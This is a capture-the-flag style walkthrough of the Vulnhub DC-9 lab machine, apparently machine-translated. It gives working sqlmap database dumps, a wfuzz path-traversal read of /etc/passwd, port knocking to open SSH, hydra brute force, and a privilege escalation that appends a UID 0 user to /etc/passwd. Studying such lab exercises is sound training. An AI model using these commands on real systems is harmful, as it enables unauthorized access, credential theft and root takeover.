Table of contents
1. Introduction of the target machine
Vulnhub target machine download:
Second, the penetration process
1. The basic method of privilege escalation
1. Introduction of the target machine
Vulnhub target machine download:
Official website address: https://download.vulnhub.com/dc/DC-9.zip
DC-9 boot interface
Second, the penetration process
1. Information Collection
host discovery
Both arp-scan and nmap in kali can:
arp-scan -l
nmap -sP 192.168.184.1./24
Get the IP of DC-9 as 192.168.184.128
port scan
nmap -T4 -A -v 192.168.184.128
Port 80 and port 22 are scanned, but port 22 is closed.
2. Web penetration
a. http access port 80
The methods that can be considered are right-clicking F12 to view the source code SQL injection brute force cracking directory scanning
nikto -host 192.168.184.128 #nikto会自动补充80的端口和默认的根目录
get/config.php/includes
Visit /config.php, blank interface, maybe no permission.
Visit /includes
Test search.php for SQL injection
'or 1=1#
Jump to resulls.php, indicating that this page should have SQL injection.
F12 View URL information
b.SQL injection vulnerability
Sqlmap run
sqlmap -u "http://192.168.184.128/results.php" --data="search=1" #查看是否存在漏洞
There is a SQL injection vulnerability
Explosive library
sqlmap -u "http://192.168.184.128/results.php" --data "search=1" --dbs #列出数据库
three databases
[*] information_schema
[*] Staff
[*] users
Explode the users database first
sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D users --tables 
1. Explode the UserDetails table
sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D users -T UserDetails --dump #列出管理员账号密码(爆表)
Generate username and password into a txt file.
sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -C "username,password" -T "UserDetails" -D "users" --dump
Copied into the documents user-dict and pass-dict.
2. Explode the Staff database
sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D Staff -tables
Explode the Users table
sqlmap -u "http://192.168.184.128/results.php" --data "search=1" -D Staff -T Users --dump -batch #batch 自动化运行
Good luck admin: transorbital1
admin | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) log in
Discovery prompt: File does not exist The displayed file does not exist, and the guess may be that the file contains a vulnerability .
wfuzz tests etc/passwd , requires website cookies.
wfuzz -b 'PHPSESSID=rjo08bi63fp8js96948u40sas8' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.184.128/manage.php?FUZZ=../../../../etc/passwd 
Filter it with --hw 100
wfuzz -b 'PHPSESSID=rjo08bi63fp8js96948u40sas8' -w /usr/share/wfuzz/wordlist/general/common.txt --hw 100 http://192.168.184.128/manage.php?FUZZ=../../../../etc/passwd
Indeed, the file contains a vulnerability http:ip/manage.php?file=../../../../etc/passwd
hydra blast ssh
hydra -L user-dict -P pass-dict 192.168.184.128 ssh
However, the blasting was not successful, and it was found that port 22 was filtered, which should be a firewall.
3. Use knockd to open ssh
- knockd.conf is a port testing server tool. It listens for all traffic on Ethernet or other available interfaces, waiting for a special sequence of port-hits. Client software such as telnet or Putty initiates a port hit by sending TCP or data packets to the port on the server, or you can directly tap the port with nc.
- Port knocking is a method of externally opening previously closed ports through connection attempts. Once the correct sequence of connection attempts is received, the firewall dynamically opens certain ports to the hosts that are allowed to connect.
The default configuration path for the knockd service:/etc/knockd.conf
Use the file to contain the vulnerability to traverse and get the password to knock on the door. It can be understood in this way. sequence = 7469,8475,9842
Test these three ports with nmap in turn:
nmap -p 7469 192.168.184.128
nmap -p 8475 192.168.184.128
nmap -p 9842 192.168.184.128
nmap test port 22
In this test hydra -L user-dict -P pass-dict 192.168.184.128 ssh
Open three new windows and log in these three users.
1. Chandlerb user
2. joeyt user
3. The janitor user has a password.txt
Generate the password into pass-dict1, and use hydra to test it again.
ssh login fredf ssh [email protected]
sudo -l to see if there are any files that can be executed by non-root users:
It is found that a file in the fredf user can read arbitrary content and append to any file to escalate privileges.
Enter the directory /opt/devstuff/dist/test/ to view the test file and find that it is compiled by python.
4. Escalation of rights
1. The basic method of privilege escalation
history sudo -l ls -a find/ ...
sudo ( is a linux system management command, a tool that sudoallows system administrators to allow ordinary users to execute some or all commands, such as halt, reboot, su, etc. In other words, through this command, non -users can run only commands executed with permissions)rootrootroot
kernel vulnerability
SOUTH
timed task
Take the kali machine as an example
cat view user information
cat /etc/passwdThe id of the root user is 0
Use Openssl to construct an encrypted password and construct a new user admin
Save the new user's information to a temporary file /tmp/admin
view user information
openssl passwd -1 -salt admin 123456
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cat /tmp/passwd
Operate on ssh's fredf
Use the test program to append the constructed user and password to /etc/passwd
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
sudo ./test /tmp/passwd /etc/passwd
cat /etc/passwd
Check the /etc/passwd user information, which has been added.
su command to log in to admin: 123456
Escalation of rights is successful! ! !
V. Summary
Summary of DC-9 target machine penetration:
1. When encountering a login interface on the web, multiple considerations should be considered, such as F12 to view the source code, SQL injection, brute force cracking, directory scanning, etc., and how much to view the file directory when the file contains vulnerabilities, such as user information /etc/passwd etc.
2. When you know that the 22-port ssh service is not open (filtered), you must even Baidu come up with a solution to closing the port, get the knowledge of the knockd service, find the path, and use knockd to connect to ssh.
3. After obtaining the py file in the user fredf, you can read and append files, etc., and you are familiar with linux operation commands. Openssl creates a new user admin:123456, saves it to /tmp/passwd and appends it to /etc/passwd, and logs in to the admin user with su , Elevation of rights successfully! ! !
New knowledge points:
①: Understand the default path of knockd service: /etc/knockd.conf
②: Learn the hydra tool is very convenient to use (the tool is very powerful!)
③: Understand the basis of Web files containing vulnerability traversal information
④: That is The format of /etc/passwd is best if you don’t understand it. It’s easy to make mistakes.
Format: Username: Password: UID (User ID): GID (Group ID): Descriptive Information: Home Directory: Default Shell
("x " Indicates that this user has a password, but it is not a real password. The real password is stored in the /etc/shadow file. The
shell that allows login is /bin/bash, and the shell login that is prohibited is /sbin/nologin)